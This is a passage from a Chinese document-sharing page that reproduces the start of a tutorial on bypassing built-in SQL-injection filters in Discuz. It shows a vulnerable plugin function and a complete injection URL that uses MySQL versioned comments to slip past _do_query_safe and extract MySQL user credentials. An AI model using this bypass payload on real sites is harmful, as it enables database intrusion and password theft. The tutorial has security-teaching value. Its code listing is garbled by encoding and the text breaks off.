- 1、本文档共28页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
几种通用防注入程序绕过方法
几种通用防注入程序绕过方法
0×00 前言
目前主流的CMS系统当中都会内置一些防注入的程序,例如Discuz、dedeCMS等,本篇主要介绍绕过方法。
0×01 Discuz x2.0防注入
防注入原理
这里以Discuz最近爆出的一个插件的注入漏洞为例,来详细说明绕过方法。
漏洞本身很简单,存在于/source/plugin/v63shop/config.inc.php中的第29行getGoods函数中,代码如下所示
?
01 functiongetGoods($id){ 02 ??????$query= DB::query(‘select * from ‘.DB::table(‘v63_goods’).’ where `id` =’.$id);
03 ????????$goods= DB::fetch($query); 04 ????????$goods[endtime2] =date(‘Y-m-d’,$goods[endtime]);
05 ????????$goods[price2] =$goods[price]; 06 ????????if($goods[sort] ==2){
07 ????????????$goods[endtime2]=date(‘Y-m-d H:i:s’,$goods[endtime]); 08 ????????????$query= DB::query(“select * from “.DB::table(‘v63_pm’).” where gid=’$goods[id]‘ order by id desc “);
09 ????????????$last= DB::fetch($query); 10 ????????????if(is_array($last)){
11 ????????????????$goods[price] =$last[chujia]; 12 ????????????????$goods[uid]? =$last[uid];
13 ????????????????$goods[username]? =$last[username]; 14 ????????????????$goods[pm] =$last;
15 ????????????????if(time()+600$goods[endtime]){ 16 ????????????????????$goods[endtime] =$last[time]+600;
17 ????????????????????$goods[endtime2]=date(‘Y-m-d H:i:s’,$last[time]+600); 18 ????????????????}
19 ????????????} 20 ????????}
21 ????????return$goods; 22 } ?
触发漏洞的入口点在/source/plugin/v63shop/goods.inc.php中的第6行和第8行,如图所示:
下面可以构造如下请求触发漏洞了,如图所示:
不过程序内置了一个_do_query_safe函数用来防注入,如图所示
这里跟踪一下_do_query_safe()函数的执行,它会对以下关键字做过滤,如图所示:
?
因为我们的url中出现了union select,所以会被过滤掉。
绕过方法
这里利用Mysql的一个特性绕过_do_query_safe函数过滤,提交如下url:
1 http://localhost/discuzx2/plugin.php?id=v63shop:goodspac=infogid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0×23,password),8,9,10,11,12,13 from mysql.user 这里我们跟踪一下,绕过的具体过程。它会将/**/中间的内容去掉,然后保存在$clean变量中,其值为
1 select?*?from?pre_v63_goods?where?`id` =1?and?1=2?union?/**/?1,2,3,4,5,6,concat(user,0×23,password),8,9,10,11,12,13?from?mysql.user 再进一步跟踪,它会将/**/也去掉,然对$clean变量做过滤,如图所示
此时$clean值,如图所示
此时$clean变量中不在含有危险字符串,绕过_do_query_safe函数过滤,成功注入,截图如下:
0×02 Discuz X2.5防注入
?
防注入原理
Discuz X
您可能关注的文档
- 养老地产产品精细化设计及案例研究.ppt
- 写得生动写得实在.ppt
- 内蒙博源1000kt循环水站.doc
- 农业推广项目计划的编制与执行.ppt
- 农业区位因素与区位选择.ppt
- 军事地形学2.ppt
- 写作基础(四).ppt
- 农业机械化的增产作用(备).ppt
- 农业机械学-谷物清选机械.ppt
- 农业水利工程认识实习报告.doc
- 第1章机械运动真题演练(原卷版+解析).docx
- 29、走进信息时代(原卷版+解析).docx
- 第五章《透镜及其应用》真题训练(原卷版+解析).docx
- 第3节电阻的测量(第2课时)(双基过关+考点突破)-2022-2023学年九年级物理全一册通关讲义(人教版)(原卷版+解析).docx
- 专题20电与磁(原卷版+解析)-备战2023年中考物理精选考点专练(知识清单+基础+拔高).docx
- 专题8—电学—欧姆定律计算类—2023年中考物理计算题专题提升培优练(原卷版+解析).docx
- 专题14内能的应用-2023中考物理考点剖析与提分技巧(原卷版+解析).docx
- 专题06质量和密度--5年(2018-2022)中考1年模拟物理分项汇编(安徽专用)(原卷版+解析).docx
- 挑战17实验题(力学综合26题)(原卷版+解析).docx
- 专题9.2牛顿第一定律(原卷版+解析).docx
最近下载
- 办公用品订购合同范本.docx VIP
- WORD版本刻度尺-A4纸打印可用.doc
- 90nm逻辑产品Peeling缺陷的解决方案.pdf
- 神经系统的分级调节.pptx VIP
- 中建施工总平面布置图设计(69页).pdf
- 2024年公共卫生与预防医学继续教育平台“大学习”活动线上培训栏目考试题库(1392题).docx
- 北师大版(2023)必修第一册 Unit 2 Sports and Fitness单元教学设计.pdf VIP
- 2016-2023年长沙民政职业技术学院高职单招(英语/数学/语文)笔试历年参考题库含答案解析.docx
- 农业经济学-农业资金.ppt VIP
- 齐鲁医学神经系统疾病的辅助检查.ppt VIP
文档评论(0)